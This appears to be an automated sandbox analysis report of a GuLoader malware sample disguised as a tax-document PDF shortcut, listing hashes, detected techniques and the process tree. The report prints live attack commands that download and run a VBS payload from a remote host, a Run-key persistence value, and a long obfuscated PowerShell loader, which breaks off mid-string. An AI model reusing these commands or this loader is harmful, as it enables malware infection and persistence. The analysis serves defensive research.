guloader | 766044286d00b36afb454e85f529356a93cb9b6d389bbe255c10e1cd745886d4

General

Target

S_K _Beaumont_TaxDocuments.pdf.lnk
Size

2KB
MD5

c92d58caccaa377d4fbec66e06d3433c
SHA1

42d7500783a111aa5150a9e0a6809eaace482cfc
SHA256

ab1eb7454d2cc5549c4c09422cdeb2fbf9254a977a42b03ca887a42d4e66f84e
SHA512

f71dc8dc6074ce92afa7a0b16f10fd0e7c827caf59977e0158e5e470f74a6e6e10ed2efe9f69a3b2678cd23f9726cf2ba496a0d1aac857a1cf1eb42404adbade

Score

10^/10

guloader downloader persistence

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Blocklisted process makes network request 1 IoCs

flow	pid	Process
12	3472	powershell.exe

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	ieinstal.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows\CurrentVersion\Run	ieinstal.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Seedman = "%SaltoQ% -w 1 $Hemithyroidectomy127=(Get-ItemProperty -Path 'HKCU:\\Vallens\\').Ethynyl;%SaltoQ% ($Hemithyroidectomy127)"	ieinstal.exe

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
4208	ieinstal.exe
4208	ieinstal.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
232	powershell.exe
4208	ieinstal.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 232 set thread context of 4208	232	powershell.exe	95

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\Sacramaese.vbs	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings	cmd.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
3472	powershell.exe
3472	powershell.exe
2812	powershell.exe
2812	powershell.exe
232	powershell.exe
232	powershell.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
232	powershell.exe
232	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	3472	powershell.exe
Token: SeDebugPrivilege	2812	powershell.exe
Token: SeDebugPrivilege	232	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4208	ieinstal.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 4648 wrote to memory of 4092	4648	cmd.exe	81
PID 4648 wrote to memory of 4092	4648	cmd.exe	81
PID 4092 wrote to memory of 3472	4092	WScript.exe	82
PID 4092 wrote to memory of 3472	4092	WScript.exe	82
PID 3472 wrote to memory of 4904	3472	powershell.exe	84
PID 3472 wrote to memory of 4904	3472	powershell.exe	84
PID 4904 wrote to memory of 2812	4904	WScript.exe	88
PID 4904 wrote to memory of 2812	4904	WScript.exe	88
PID 2812 wrote to memory of 232	2812	powershell.exe	91
PID 2812 wrote to memory of 232	2812	powershell.exe	91
PID 2812 wrote to memory of 232	2812	powershell.exe	91
PID 232 wrote to memory of 2332	232	powershell.exe	94
PID 232 wrote to memory of 2332	232	powershell.exe	94
PID 232 wrote to memory of 2332	232	powershell.exe	94
PID 232 wrote to memory of 4208	232	powershell.exe	95
PID 232 wrote to memory of 4208	232	powershell.exe	95
PID 232 wrote to memory of 4208	232	powershell.exe	95
PID 232 wrote to memory of 4208	232	powershell.exe	95

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\S_K _Beaumont_TaxDocuments.pdf.lnk"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4648
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "\\localhost\c$\Windows\System32\SyncAppvPublishingServer.vbs" n; Invoke-WebRequest http://0x6D.13561923/shitter/Eksegese64.vbs -OutFile C:\Windows\Tasks\Sacramaese.vbs; C:\Windows\Tasks\Sacramaese.vbs; Invoke-WebRequest http://0x6D.13561923/shiter/info.pdf -OutFile C:\Users\Public\new1.pdf; C:\Users\Public\new1.pdf
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:4092
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n; Invoke-WebRequest http://0x6D.13561923/shitter/Eksegese64.vbs -OutFile C:\Windows\Tasks\Sacramaese.vbs; C:\Windows\Tasks\Sacramaese.vbs; Invoke-WebRequest http://0x6D.13561923/shiter/info.pdf -OutFile C:\Users\Public\new1.pdf; C:\Users\Public\new1.pdf}
    3⤵
    - Blocklisted process makes network request
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3472
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\Tasks\Sacramaese.vbs"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:4904
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ignorer = """Gud;BecFMoruMusnSyscSkitGooiSteoSpunPal ToeFAppiDissparhPlabBruoPrewJoklMid0Ect spo{Non Ret Kno Aan RospUnkafugrLinaUntmOrd(Fje[CleSEnhtOverUnridegnStyglun]Ufo<StbTDorefnotKnirfolaTrksKartForePasrfre)Gon;Fde Fak amb Omk Sen<PsyKPosoKomrAlenTareMistLapsUnv Que=Fla DisNSpneReswPol-SusOMorbbogjTroeSydcKiltVar BisbProyFrutdraebri[Syl]Pra Joh(Sto<KonTFlaePartBaarSyraLicsEsctOpieLberAmb.WanLvereCrenAflgUvatinvhLov liv/Blg Sie2Kon)Aff;Vic Mis Voi Flo BabFCaroForrTid(Grd<BesSRemiBogeSkisUndtApaasimeGanrExt=Tha0Sor;Gol Tem<LsgSUniiCoreJersJortploaopbebrurOff Par-JutlAlltSwe udv<OboTKlieAnetKrirRomaDatsGletcoweClarFar.LayLBefeAernRepgSlithodhGoo;sou Pre<MeiSBiliDereUndsUnttEpoaWhieHyprKog+Kon=Opr2Meg)Siz{Res Bef Ani Kns Dia dec rya Pre Afr<broKIndoReyrAdmnJaceSkitSkrsRdo[Mar<DogSTraiTrieJatsMoftUdsaIndeArcrSpr/Tri2Kon]deh Drm=Ans Pus[jivcArcoGolnTilvBuneGrurnigtDic]Gly:Rew:InbTWoaoCalBPtoyHyptVireEph(Ade<NivTFoeeRedtLaarPreaMacsBaftsaleCherCas.DipSrafuBlubRdmspsetBrorKriiUndnLaagHt (Shi<FilSPleiWaneBogsPaatSmraFakeEftrAar,Lex Opk2rhy)Brn,Nai Tnn1Tra6sen)Epi;Wel Sti Mtl<CalKSlioBlerCotnOpkewigtRavsSka[Con<PerSResiVaaeDecsAsitSchaCapeAstrAns/Ket2Sol]Imp Jou=Ant Fon(Inv<DriKSinoBerrBefnUroeByptRygsOpf[Sau<TerSSidiBlueUdfsDagtUliaCheeConrHen/Ina2Tvr]Und Adg-IndbSekxSteoImmrHet Kul1Cha7Fra7Luc)For;Sla Sge Hom Fre Stu}Kor Ten[RntSFlutEntrNetiAthnBargGem]Rep[IdeSSevyUsustrotPipeFasmPal.ElaTKameEksxTidtBdd.PatEWhinAstcRewoNeedPupiTrenTaxgLil]ess:Udr:purAInkSPanCIagIRebITel.CerGStbeBestSpeSLegtTrerSepiMohnPaxgOms(Jov<TorKArtoReurNonnNabeTratSamsSal)Jan;Mag}Ver<ModtEpireksaFranGamqSty0Tab=BloFSubiArnsLmmhAakbSedoFllwTanlSof0Uig Lyd'sloEbro2AfmCKur8NumCimm2RefCcon5DivDUnc4domDGenCCra9DivFSekDRec5AutDAabDPreDConDStr'Uns;Pel<DebtUnsrErkafrenSpiqGud1War=FisFMiciForsBrohpalbRocoStowAlplVar0Bas Std'ChrFflyCPreDBje8StyDLog2myrCFlu3TakDFinECheCCos2brnDAvaERasDTra7KriCBio5Cir9MolFPasEOve6AstDAli8SumDLanFSpi8Mic2Bes8Ple3Ter9FinFOohEVit4HomDPatFBrsCMan2UniDBow0GunDGal7monDUnn4ExeFstjFKosDPro0UndCGna5FirDEks8OmvCNon7LagDmid4FogFForCUdrDPer4ProCTid5UncDGen9SviDIdeETalDNet5EyeCHab2Woo'Haa;Gog<ReftCycrUamaFunnLigqDer2Tar=TigFWhaiOvesMinhfribLisoBruwSoclAfb0Sko For'thrFTil6AlaDUge4BryCNon5NipEBoe1AerCSob3RegDSydEOesDTau2OtiFUfo0RetDAla5unpDKle5UndCPet3LavDHyp4YapCBlo2WenCslo2Glu'Sun;Are<CaltMaorDomaRecnTreqGif3Tha=ClaFSchiCyksIdihSesbfraoStvwIrilPos0ack Tri'DewEPun2CayCUrc8ModCDom2FraCTra5UndDPot4ProDRepCOve9ManFForEMis3HorCSko4OliDAfsFTimCMot5BunDBre8MegDTilCExoDCav4Afk9UtoFVanFCon8LevDBarFSmiCado5CamDQuo4ConCLyd3AviDRocEtotCPho1GriEMan2TilDCau4aneCBir3FngCCos7ParDPar8AviDKlu2TelDFle4MidCKon2Car9SalFVelFSid9DaaDDin0GenDNigFIngDViv5LykDTilDKraDPet4HydEYde3HorDHya4SpeDStu7Uds'Ext;Sob<HagtUnurAnoaHannFleqbut4Uud=DiaFDesiSupsVamhPokbAntoPrewEkslKok0nys Fur'CoaCTue2souCBrn5RevCSul3HenDmej8UfrDDisFUfoDKos6Liv'Byg;Tig<EmntEntrHovaPrenTedqAtr5Imp=IndFPhoiPycsCerhMetbLreoIntwIntlBoo0Ska Tid'LilFOup6RenDAva4AzoCOpt5nonFNonCHvdDSlyEPrcDMet5BekCBil4ConDShiDplaDKup4BevFMaa9KnoDExu0SleDExcFRecDBlo5BloDEseDAnnDAng4Gen'Bil;Mis<UngtSafrWraaSlanAsiqPse6Pht=ForFJuviGaasspehAbdbScuoHetwRetlSno0tra Ove'VitEKoo3CenEKva5RumECla2AnaCcoi1JusDint4FibDPar2TilDFor8PhoDSam0TanDKvaDIntFDivFLoiDPho0CasDMinCTysDUnp4Vis9SigDEns9Mov1ShoFUeu9IdrDPro8SndDSin5UnsDTro4BogFArc3SomCCof8KonEPar2ForDTob8SubDdog6Ung9WinDSyk9Oxi1FriEdok1MatCnit4EffDSig3FrkDUdeDRerDPan8DelDMis2Amt'Shi;Rec<LamtElarAluaSkonSelqUvi7Brd=BetFMrkiRhisCamhSpobEryoOvewCenlOwe0bor Wor'CheEove3AnnCPla4UnrDKarFTimCEqu5SamDTen8MllDudeCUnpDOve4Mer9allDMet9Hor1SkoFTveCFasDTah0PriDBasFKjoDSpo0HdqDtru6SteDKru4PreDDim5Lbe'baa;Tig<enftSperTopaHypnUndqSky8Int=RdsFXyliRensManhSkebInqoDeswHaalScu0Obe Udp'FrsENon3GarDUnp4kmpDMen7BonDTemDAgrDGro4KalDbus2DomCOpe5GyrDCoh4AliDNav5BlnFSpo5DirDind4KviDEsdDKonDPha4PerDPre6GenDMis0HieCLde5EneDMan4Kan'Fur;Cru<ShatDisrGenaHldnChaqAme9Enr=EvaFVexiHemsPhohArbbAneoSelwVerlTrf0Mat Dre'MelFAmi8EksDturFSpiFArcCGreDUdv4UnmDArbCFidDRavEradCGei3TreCcom8PasFLanCSurDDatEKluDHet5EleCCas4StaDForDSumDReb4Koa'Ble;Suc<MidVmeriKoorRankKlusSphoDismNazhOeveTesdhovsHeagSemrChaumolpHngpKooeFor1Pap0Ret4ret0Ove=KurFMediIndsStrhgrubLifoDefwHomlYnk0Myx Com'FysFManCWelCBef8SkaFImp5KnsDRel4MobDTesDStrDUdr4NedDMed6DedDMis0AanCJor5PosDHyp4BjeERec5IndCOps8AggCCon1FerDall4mus'Unc;Top<RanVLitiEscrPolkiresAaroMatmEpihJoreUdbdBessAnggStirAdmuallpStipSzaeint1Bac0Iso4Dav1Res=susFSkriRilsUdshPedbCysoIntwGlilHol0Imm Opr'BriFGem2HedDAboDudkDUnr0sknCFog2gunCRat2Eff9UdnDFot9bal1TriERes1SuiCGra4SelDAcr3IntDPreDByrDTre8garDVig2Ste9StaDBli9Hov1CanEDer2TaaDRef4sigDSka0troDRadDSurDKoi4FarDCon5Ops9DiaDove9Bla1BlaFPak0UroDRedFDemCGen2ValDAnh8SviFOve2BraDKerDCycDWit0thrCSno2YppCHum2Enb9SpiDHil9God1PulFMak0ProCBid4FlaCPer5NybDKloEMatFCor2cunDPriDVinDTal0RenCPek2MerCSyn2Coa'Fri;Unc<SatVTodiPrirFlukUdpsAnkoHoomTubhOpleEdudAdmsHoegAverKrouUncpPelpInseSyr1Unt0Sum4Dus2Opt=misFKluiunosFothHurbBamoMemwElulGly0Mis Bet'hovFGre8PosDMetFTomCPri7FilDinaECriDRerABesDtro4myr'Ego;Sko<UncVHygiKolrSnrkSkasPacoOpkmArkhMaseImpdBunsNumgFerrFoeuBorpChapTuneSek1Del0Ris4Umu3Sam=arbFEroiKresHjehVelbPeyoIncwApploct0spa Min'DepEUdt1StrCPol4NewDGra3sulDGenDDeoDFor8HydDVra2Tim9LanDBed9Inc1sirFOmp9LimDreg8PipDaut5UnfDtve4wanFCat3andCStr8GumEImp2DulDApp8ReaDKom6Tub9AlmDTvr9Hjh1NonFfinFPreDDex4SkiCPri6TaxELep2FimDPenDGarDFakETogCSkr5Pix9BlrDKil9Hoo1AssEGun7monDOst8DemCDes3senCTol5altCGab4BerDJen0TriDPreDluc'Kal;Gun<GalVSamiLanrBiokOctsIsooPormPikhPrpeFordHresVaggNonrAkvuCenpRuspLusePlj1Cos0Dre4amb4Car=HogFHuniPaasHaahPalbJouoDepwUnnlhar0gre Bli'FlaEOpe7RusDPhi8KonCMod3TykCAng5LeaCUli4DorDJos0JahDHauDErhFFrk0HamDLinDSymDExuDRelDUnhEDybDtor2Sen'Der;Den<AanVrusiLiorUnfkhemsRetoUncmSolhHjreHuedSlesSlagMisrCoduSmapOvepGeneHaa1Geo0dro4str5Bil=midFHatiBeasanohAdvbPiroSupwFoolFre0Ant Cam'UnsDSluFAfkCPin5SpoDNon5FraDUntDBleDParDBal'Ina;Con<AniVOpliUnprVulkNedsSkloFormInchDefeRundTelsHaegDivrAstuEropwhepGoeeDec1Pro0Ser4Bes6Kas=SprFOliiDecsFlihunmbVaroAntwpavlHer0Tup Sub'MilFAmbFEruCKra5UnsEUrn1BesCTig3StyDUniEBluCReg5HjeDAng4CheDEft2triCUnc5WanEMat7UnaDVrk8BesCSkr3DobCNon5PreCVol4KalDDdb0BalDPetDMigFBloCMonDUdv4VidDManCAphDRefEHekCTan3KreCArv8Unw'Med;Beb<BleVOrgiMedrAarkStrsMytoSjlmMonhUopePardImpshydgForrEuruPrepFrapAuteTag1Sup0Pra4Aut7Kre=EquFForiHalsMeshBicbBaroAfrwArtlAvo0Dis gla'HylFEpo8SodFCor4AutEAes9Dho'Ove;Hya<BedVAdviUndrAlokModsNonopremKashvikeVandstasOvagLinrOlluIncpundpGnieSte1Exh0Aft4Bit8Bip=KryFFaliSmasPashAmabSheoGuawAfdlLnn0Ero Fin'StaEPreDRhy'prr;Chr<SprREmbeIntsEdioOutlSc eChamNavnVagiPrasTemeenesRep=SviFBugiGrasEsohBelbWetoAcrwFjolAcl0Kon Add'PomEMat4MacEDex2RemFTon4QueELap3Hel8Ove2Sny8Par3Mon'Lig;Sam<StaSDiseHernKvasDooiromtFriiAntzSaneGigdGar=StaFGaliUngssidhPribPsyoEriwEnflDra0Dib Mat'AshFSer2TakDUnr0NatDcaiDSygDFemDBilENus6FriDRaa8ChlDDeuFnymDFri5JenDEnsETraCLyd6DomESer1UdgCRul3OveDSetERepDVal2PlaFPig0Ver'Man;MaafTimuLannBygcBrotDeliSatoGernemb RevFToliCadsCanhValbScloLapwMaalEct2Sto2hum Pli{simPSpeaBrarDokaOlamDis For(Fra<kebOCowmUnbpRowrTervdiaeUnn,Cor Sko<KejKCloubrdmSkaeAntngoliStokSkueSkarMil)Pol Han Ret Mic Ult Pho;Dir<AanAFllnVesfPargHjatDweeKmplspiiDavgCryeVissUns0Snu Kra=TruFIsmiBegsAllhUnpbBeloKriwRailKon0Unt Ove'non9Bel5GyvFCor5ProDFon8FliCPer2AabDThuFDocDUno4toeCSmu8CamDFedDCorDMay0udtDTarFLosDSou5For9Req1Amp8SanCTal9Pro1Alk9Par9AvuEBedAAutFRes0WooCagu1PlaCThr1skvFKla5PigDUdsEAcyDKodCGaeDusy0ProDAmm8SulDAscFPenEDelCBea8AdfBTha8FonBRegFAna2AvaCcor4SipCVel3InuCDox3ReiDKut4CreDFirFThrCGyn5DunFZel5SulDFjeEFatDExtCSprDMat0KolDMoh8PetDBicFWor9ostFAtaFFej6LumDNaz4fllCUns5PolFUnp0DisCUfl2SpaCSva2HenDUde4durDForCOilDDis3UnaDBlnDeksDStj8MelDBov4SalCTid2Chu9Hof9Med9Tra8sil9Bor1RunCGogDthi9Glo1FetEAme6RapDCon9DorDMod4MulCVal3BorDfje4taf9GgeCmicFLegEhjlDndt3skiDAniBRegDAlm4OveDHur2TurCDul5Sma9Cou1FotCVidAEnc9ove1Pla9Tva5EncEFjoEOce9PomFPanFGru6ImpDFavDOphDHerEJudDKro3MonDCau0AolDEveDOpeFSem0HajCMai2KomCWal2FnaDPir4ParDmisCaccDLip3FilDgooDTwyCRig8EpiFBan2PrmDHas0KroDCoa2UnpDSom9FlaDFle4Bai9Qui1Rig9butCCepFkau0LakDEroFMecDMer5Mil9Stu1Tse9Imp5kbeEUnaEUdd9CotFSprFHalDSigDSupEGolDTte2HenDThe0BarCMal5LucDArb8RulDReaEEksDBimFUni9KamFUrbEEur2MusCVan1NitDdhoDRidDSkr8sliCDuv5Bip9Rok9Det9Sen5AfsEJol7BucDTol8undCliv3DelDCheAModCBat2LenDDhoECasDTeoCPblDSup9scoDAns4EksDFrs5EctCDil2MtgDRhi6EksCMed3LitCIne4MalCCli1oppCFif1EleDExe4jod8Sko0Klo8Rec1Car8Peg5Vic8mis9Sel9Dri8IsoEFenAApo9RecCSto8Hum0DeaESodCVar9SpaFSprFInf4TopCHyl0PomCInd4IntDCha0MaiDNatDVitCopn2Ell9Jes9Gra9Gla5genCSta5SkiCSoc3BefDRic0DecDmonFForCKno0Dri8Unm1Cru9Non8Mud9Ant1RekCKloCBes9Dab8Ast9AngFPapFSkr6QuiDNar4GloCBol5DruEFug5robCLsg8UndCPap1JatDsol4Kni9Afg9Ove9Sku5UdsCHob5DuoCTeg3ForDNon0LaiDWarFRebCUnd0Rhi8Bot0Pro9Skr8Oms'Bal;Dru.Ker<TriVCariDesrchakStysAceoRepmdauhOveeFordMalsWingKumrboruSexpInhpGraeWas1Sav0Sub4Kun7Ark Jap<SamAslgnSkrfIncgDyrtRipeOpslJoiiVitgMoreCresFor0Sag;Hus<SkaAAganArefStegBertForeBiblPeriVolgReseLeasLum5Deo Uor=ell VivFPariPrisNdehMaubPhyoNykwUdflCha0Ool Uns'Stu9Sni5SalEIl 2MomDUnd4HjoDPerCCasDErl8sitDingFTvrDLagEStaDLgnCMisDFor0KidDCom5BooDkla8sinDMaa2Mar9par1Ove8PalCPro9Lig1Mir9Kos5MoiFRag5NabDKab8UndCMod2EksDExcFWigDTra4OpsCTrb8PreDEarDResDPol0ResDKejFjulDMal5Che9ArbFAvaFGru6SemDTex4airCRee5BesFPreCPreDenc4StoCHel5ForDPam9InvDTafEOccDPre5Blr9Rim9Buf9Sve5SpeCThe5CenCAlm3adoDNon0GabDNonFPseCOut0Brn8Sup3Dis9UnsDaer9Are1bleEJamAGaaEHen5HieCOve8SceCSpi1AntDRen4musETouATolEMetCFeoELinCFor9Ilb1BusFNob1Toh9Mis9Ove9Mon5LovCSki5PsyCInd3AcqDRat0CowDFalFSilCret0Vel8Vin2Win9EnvDIll9Dyn1Eye9bra5SemCDah5infCUnn3lutDBir0calDSenFBesCult0Reg8Imm5Cen9Gen8Fis9Non8Tau'Pri;Nyl.Bog<TucVPreiSterGalkSamsStaoRecmcrohKeresphdtresTvagPrsrOilutrapRadpAnkeStr1Feu0Ple4Cho7Sax Sed<HamASchnTrifhvigAcctUndeOxilFagiTragKaneEdusBlu5Typ;Seo<DagAsmonAssfShegBaptTyleSpilSupiliggViseRicsNyc1Pro San=Den EnaFDueiSkusMachCanbUntoIndwDyklSkg0Kva Jur'LutCWap3DecDSup4RatCSta5SpiCsek4MetCSkr3LysDChaFArm9Hol1Gal9Mas5UnsEJam2PedDsla4SknDMutCSkrDPul8PlaDPloFFodDAdaEcanDBueCForDsup0InsDLys5ForDTek8LilDRec2Skr9VanFaffFBer8SklDSpaFEmiCIdr7UdbDKerESurDFreAButDMoo4Ant9Fla9Cep9Str5PalDjudFRetCBrs4SliDSulDCofDDerDAns9LepDCop9Tor1IndFFil1Non9Jul9TidEInsAPneEPeu2ProCThe8GonCArt2JurCpyt5MedDdan4FesDlinCCha9PhoFMalERoa3AndCKry4BrnDSkrFCykCTur5CalDHal8ProDSocCSliDhem4Sug9BatFSpaFmor8ConDSurFDejCInt5MalDSal4UniCRec3SkrDWesESkrCagr1VarEAlm2LogDsex4tilCAsy3BedCFra7FunDSti8HaaDDat2AspDMei4skuCRep2Ant9LlbFUnfFSto9SalDspy0SupDDigFHekDSer5MarDPerDBesDArc4ChoEFor3GonDSkv4TalDInd7CalELeeCGla9Pip9PraFBlsFtroDper4regCFor6Kar9UdsCKurFBovERigDFot3LolDLogBBl DGrn4afgDMos2NkkCOpp5Udk9Und1OceEsti2KreCViv8FanCCon2UnhCKry5MesDGyr4HabDUneCDok9CerFChaEGir3SluCMol4LeaDFlsFEcoCRos5forDYup8AssDuneCRepDHov4Non9ArmFKorFKva8ParDAsbFUniCUig5EchDSub4DiaCMic3VerDRolEScrCCle1TidEDec2TenDReh4HypCunr3BruCFor7HerDNon8EsoDPai2SprDTil4HesCAfg2Ato9ordFHapFBnf9EnmDSem0WalDCarFAdoDCou5LobDSkiDForDKla4badESki3SenDVas4AsnDSpi7Kin9hmm9mal9Int9OrtFbonFcirDPat4DorCKat6Hyp9QuaCKryFdetEExeDEpa3TasDVenBSpiDOut4CycDNor2TurCHat5Ani9Kol1CroFCom8ImmDHexFFriCEth5HinECry1ForCSky5IntCTra3Jam9Sem8Tob9FeoDAna9Pal1Pro9Sui9Dys9Fed5PreFSvr5BliDTan8HumCAfh2RevDKusFColDdus4LovCSri8liqDSkrDSamDBac0OveDSupFhomDCom5Ana9MusFDinFHan6KasDAsf4RevCsca5FinFOpkCCirDSmo4PemCWic5TroDLiv9OveDExpEGluDSki5Unp9Ade9Kur9Ant5KlaCApo5YanCCor3ValDSod0HemDAfsFMilCInd0Bir8ant4Bag9Tra8Cha9mad8ant9RetFVamFSmo8ForDConFStaCSco7chaDOphEFunDtraANonDSpr4Ure9Tus9Ext9Til5SanDPerFArtCTic4AleDCenDSneDDokDElu9WhoDUds9For1TorFNon1Int9Mim9Ind9Kli5FilFbjnEStrDOstCManCCon1FlaCTil3BacCDjr7StaDCas4val9Lyr8Aut9Fri8Utr9Spi8Lac9For8han9GroDCha9Pla1For9Opr5McgFJudASalCGlo4HonDTraCCouDNeg4BraDPalFEneDBod8ChaDfisAmatDKey4SubCRos3udk9For8Eks9con8Kin'Pra;Sva.ver<EimVasciSebrFrakNegsMegoSlgmTarhSupeTykdBjrsFrigWoorZituPotpTrapakteopr1Sin0Sim4bon7Gul Sta<DesAPyrnAdufFlygCattUdveDrilGodiStygChieStrsPea1Ind;Kop}colfTriuSkrnGencBrntSteiBlioCarnUnp krlFMisiMassFouhArcbDumoKarwRellKom2Men3ton unt{SucPMasaGifrkomaSlamKon Sal(Elm[UnsPEndaTalrPavaFrymBioeUhotDeceImerMic(SlvPSteoSegsKoniMontLisiFrsoRacnFyr rul=Ung Tra0Tam)non]Gen Kon[floTGgeyspiprekeHul[Bao]Mal]Mon bav<SpiOBrapSpipdisoSicnUnveguinLoktSereHierConsLim,Ste[OutPErhaGunrkraaTwemHereBoptProeGenrUnd(HelPVigoCresHesiTuntDeniRefoExtnApa Uns=Non Sil1Ves)Udt]Stu Tes[IndTSinyElepNoneRea]Dou Des<MonVBoueTalnWretvrdeKarpSoleNonnHemgRoyeGas Brd=Und Agn[menVFoloHysiTordmes]Ind)Cro;Ext<EngABranFrifNdtgequtCupeFlelTiliFragFabeUndsCas2Tri Pul=Whi DenFtykiKatsBaahDrobMidoHngwReklOve0Cal Stu'tur9Dec5ModEPla4PteDShrFobjCSpo7UndDSimEUneCFjo5StrDAll8FriDSkaFSidDFri6Pri9Wat1Exc8BraCSek9Chl1KryEbesANarFEle0KonCTil1GloCPen1KenFAmi5CoeDUndEChuDGarCScuDFin0HalDSla8RarDFolFEmbEOveCste8OccBAnt8ChrBStrFBra2VidCTub4reaCPis3UndCSab3SalDOps4ApaDStaFMicCIng5GlaFTrk5SysDDomETilDGraCNitDAdd0IntDEne8PasDMerFAfd9LanFLugFGou5DogDFor4RemDSug7HypDShi8SlaDFagFBidDUnp4gaaFEle5DesCPur8LilDLegFTouDgym0DybDFugCPecDEpa8ScaDLns2vidFpol0cybCMar2BunCNuk2ManDGru4ZilDManCSubDSea3SypDgenDTelCOpa8Rep9Oph9Afd9Sty9BraFFunFOutDIni4RipCVdd6Lnk9NonCNugFAbsESemDThe3NonDTrnBTouDEla4EpiDSol2UneCBla5Bar9Bid1solECon2SimClip8IndCDis2KorCKha5AerDMed4SknDNonCAde9AltFSteEkam3josDSkr4TroDSva7RadDAngDpanDSal4CucDDef2PenCArt5MunDFan8HalDVinEPenDGanFTil9ArtFAlbFReg0OprCSko2VaaCDia2RetDGua4OnaDMedCPolDEge3PaaDByeDKurCObl8BisFjedFCobDRep0UniDFilCpsyDSta4Esb9ort9Euf9Lis5TroCVer5sjlCIgn3KalDPur0ProDFerFDamCSka0For8Ebo9Tan9Cha8For9Rig8Uds9HemDDis9Fum1KatEOveASpeEVit2FirCMai8SkkCBre2rubCHje5YakDBry4TakDCycCFas9DysFMeuECad3ExpDTes4PriDEnv7HeaDGeoDStrDBiv4MilDDel2PunCdou5CamDWel8ExtDResEshaDRecFWoo9PulFSelFChi4TouDForCGerDLuf8SamCMod5Bef9MisFMejFMis0DioCpro2uniCTam2KniDsup4ExhDnidCPhoDZin3ColDperDVriCHar8DamFSta3ForCSid4ConDTot8AidDEloDUndDUnd5ObsDVer4traCUnd3forFFir0UnpDSub2ErmDLnf2ScaDMos4extCHus2OmvCTri2ManEUnhCsce8StoBPes8StaBKedEJoc3NulCSke4FonDAntFSip9mas8Rod9RelFCheFTor5RhaDVae4KalDRod7HvaDNon8AngDBroFSteDbil4FoaFUna5AntCSkr8AndDNonFDutDBed0CodDGryCChaDTri8SheDEgn2OpeFPraCForDGulEAerDDil5IndCUnm4LigDplaDWirDBrn4Jui9Tot9Knn9Ska5QuiCKop5ForCFor3SizDIns0FodDBraFCenCtak0Lan8Ugl8Ass9HusDBef9Bac1Pos9Sce5AllDTab7FinDRep0ForDExcDVibCKym2TigDAkt4Hyp9Fas8Sak9QuaFDecFPar5ForDFar4RomDKom7UsaDSem8UnfDBliFApaDJen4MarElad5CogCFas8BgeCOmn1HunDEll4Tre9Sel9Mus9tol5FloEerh7DecDInt8NonCMat3ComDExtASteCDyn2MikDLatEStiDImmCFeaDNor9IerDUnt4HydDMin5SkaCRes2StoDKul6OpsCPet3SkaCInt4BraCEft1TalCNon1ArcDBoo4Jug8Tum0Der8Ody1Ind8Pal5Hje8Pos1Har9TraDAfg9Syb1Dek9Beh5NonEKro7InfDhor8PseCArt3drnDSonAEneCTat2VirDpapESkpDMaaCUngDSlr9SkrDBek4KonDFin5BleCDel2UncDCar6CacCsoi3UncCEle4OndCPal1GraCRea1chrDBon4Ves8Ure0Dat8Psa1Wid8Dat5feb8Kon0Dre9SdsDKli9Pre1PapENetADomESta2AegCVol8SucCSjl2ImpCAur5ForDMav4SmiDFirCLed9DuxFGeoFLanCSarCSla4VasDUdkDtigCVrv5LinDCom8KilDHil2WinDJor0UgrCGal2MetCSov5ExpFBoo5KanDAfk4KarDSafDUnwDRve4OxtDKno6BreDRep0nidCTof5LisDBal4EniEChiCSaa9Skr8Top'com;Mag.Bro<RetVFreidowrNatkBefsStaoHu